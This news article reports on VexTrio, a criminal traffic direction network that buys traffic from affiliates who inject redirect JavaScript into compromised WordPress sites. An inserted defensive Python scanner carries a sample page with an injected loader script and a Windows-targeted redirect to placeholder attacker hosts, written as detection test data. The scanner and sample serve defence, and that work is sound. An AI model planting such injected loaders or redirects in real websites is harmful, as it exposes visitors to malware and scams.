
Cybercrime’s Silent Operator: The Unraveling of VexTrio’s Malicious Network Empire

VexTrio is a traffic direction system (TDS) with more than 60 affiliates feeding an unknown number of malicious campaigns. The post Cybercrime’s Silent Operator: The Unraveling of VexTrio’s Malicious Network Empire appeared first on SecurityWeek.

VexTrio is a massive and complex malicious TDS (traffic direction system) organization. It has a network of more than 60 affiliates that divert traffic into VexTrio, while it also operates its own TDS network. While aspects of the operation have been discovered and analyzed by different researchers, the core network has remained largely unknown.

Two of the affiliates, for example, are ClearFake and SocGholish — both known through their malware. VexTrio, however, is purely a traffic broker not tied to or recognized by any malware. 

Infoblox, a network visibility and control firm, has been tracking VexTrio for nearly two years, but has only recently come to understand the full extent of the operation. Its report published today describes the size and pervasiveness of the organization.

There appears to be a stable relationship between affiliates and VexTrio: SocGholish has partnered with VexTrio for nearly two years at least, while ClearFake has had such a partnership throughout its lifetime.

A TDS is commonly used to route visitors to targeted advertising based on characteristics discovered about the visitor. A malicious TDS uses the same principles to route visitors to malicious websites or pages. This is commonly achieved by compromising websites (very often WordPress sites) and injecting malicious code into the site. The code can discover characteristics of the visitor before selecting the next action.

Each of the affiliates has its own TDS network. Some simply send the details to VexTrio. Others will use some of the opportunities and send the rest to VexTrio, depending on the visitor. For example, notes the report, “SocGholish only targets Windows OS users that are first-time visitors, according to their User-Agent, IP address, and browser cookies. For visitors that are incompatible with SocGholish exploitation methods (e.g., macOS devices), the actors will still capitalize on the web traffic by redirecting them to VexTrio TDS servers.”

The most common method of collecting traffic used by the affiliates is a drive-by compromise targeting vulnerable WordPress sites. Malicious JavaScript is injected into the HTML pages. The complexity of the JavaScript varies between the affiliates, but it typically acts as a redirect to VexTrio servers. It is not unknown for a single site to be compromised by multiple affiliates. In this case, VexTrio rewards the affiliates on a first come, first served basis.
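As an added illustration from the defender's side (this is not code from the Infoblox report): a small Python checker that scans a page's HTML for script sources and inline redirect stubs pointing at hosts outside a site-specific allowlist, which is the injection pattern the affiliates rely on. The allowlist, the sample page and the `.invalid` hostnames are constructed for the example.

```python
import re
from urllib.parse import urlparse

# Hosts this site legitimately loads scripts from (constructed allowlist; tune per site).
ALLOWED_HOSTS = {"example-blog.test", "cdn.example-blog.test"}

SCRIPT_SRC_RE = re.compile(r'<script[^>]*\ssrc=["\']([^"\']+)["\']', re.IGNORECASE)
INLINE_SCRIPT_RE = re.compile(r'<script[^>]*>(.*?)</script>', re.IGNORECASE | re.DOTALL)
# Redirect stubs usually assign to location; pair that with an absolute URL to an outside host.
REDIRECT_RE = re.compile(r'(?:window|document)\.location(?:\.href)?\s*=|location\.replace\(', re.IGNORECASE)
URL_RE = re.compile(r'https?://[^\s"\'<>)]+', re.IGNORECASE)

def external_host(url, page_host):
    """Return the hostname if it is neither the page's own host nor allowlisted, else None."""
    host = urlparse(url).hostname
    if host is None or host == page_host or host in ALLOWED_HOSTS:
        return None
    return host

def find_suspicious_scripts(html, page_host):
    """List (kind, host) findings: external script sources and inline redirects to unknown hosts."""
    findings = []
    for src in SCRIPT_SRC_RE.findall(html):
        host = external_host(src, page_host)
        if host:
            findings.append(("external_src", host))
    for body in INLINE_SCRIPT_RE.findall(html):
        if REDIRECT_RE.search(body):
            for url in URL_RE.findall(body):
                host = external_host(url, page_host)
                if host:
                    findings.append(("inline_redirect", host))
    return findings

# Constructed sample page: one legitimate CDN script, one injected loader, and a UA-gated redirect
# of the kind the article describes (first-time Windows visitors). Hostnames are placeholders.
SAMPLE_HTML = """<html><head>
<script src="/wp-includes/js/jquery.js"></script>
<script src="https://cdn.example-blog.test/theme.js"></script>
<script src="//tds-placeholder.invalid/loader.js"></script>
</head><body>
<script>
if (/Windows/.test(navigator.userAgent) && !document.cookie.includes("seen")) {
  window.location.href = "https://redirect-placeholder.invalid/?r=" + encodeURIComponent(location.href);
}
</script>
</body></html>"""
if __name__ == "__main__":
    for kind, host in find_suspicious_scripts(SAMPLE_HTML, "example-blog.test"):
        print(f"{kind}: {host}")
```

Run against files served by a WordPress install (or against fetched pages) and alert on any finding; a site whose allowlist is maintained will normally produce none.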

VexTrio consequently combines traffic from multiple affiliates with traffic garnered from its own TDS network. Sometimes it may use this traffic in its own malicious campaigns, but will otherwise sell the details to other actors for separate malware, phishing, or various scam purposes.

VexTrio has become a major broker in the criminal underworld. It comprises more than 70,000 known domains, nearly half of which Infoblox has observed within its own customers. “We have seen VexTrio activity in as much as 19% of networks on a single day since 2020, and in over half of all customer networks in the last two years,” comment the researchers.

Image Credit: Infoblox

There is always a cat and mouse game between cybercriminals and security defenders. VexTrio has been a prolific actor using DNS to carry out attacks across the globe. DNS leaves a heavy footprint in network logs. This may not stop an operation but allows researchers to study the attacker. Recently, notes Infoblox, VexTrio has migrated a large portion of its infrastructure to shared hosting providers, making them more difficult – but not impossible – to track. 

Another method designed to avoid researchers is a delay between compromise and effect. The researchers purposely activated a VexTrio campaign known as robot Captcha, with no immediate effect. But, “After waiting 24 hours and performing a system reboot,” note the researchers, “our test machine received many push notifications disguised as messages from McAfee.”

The complex business model operated by VexTrio has enabled it to remain nameless for the last six years. It is now known. That same complexity, however, makes it very resilient and difficult to take down.
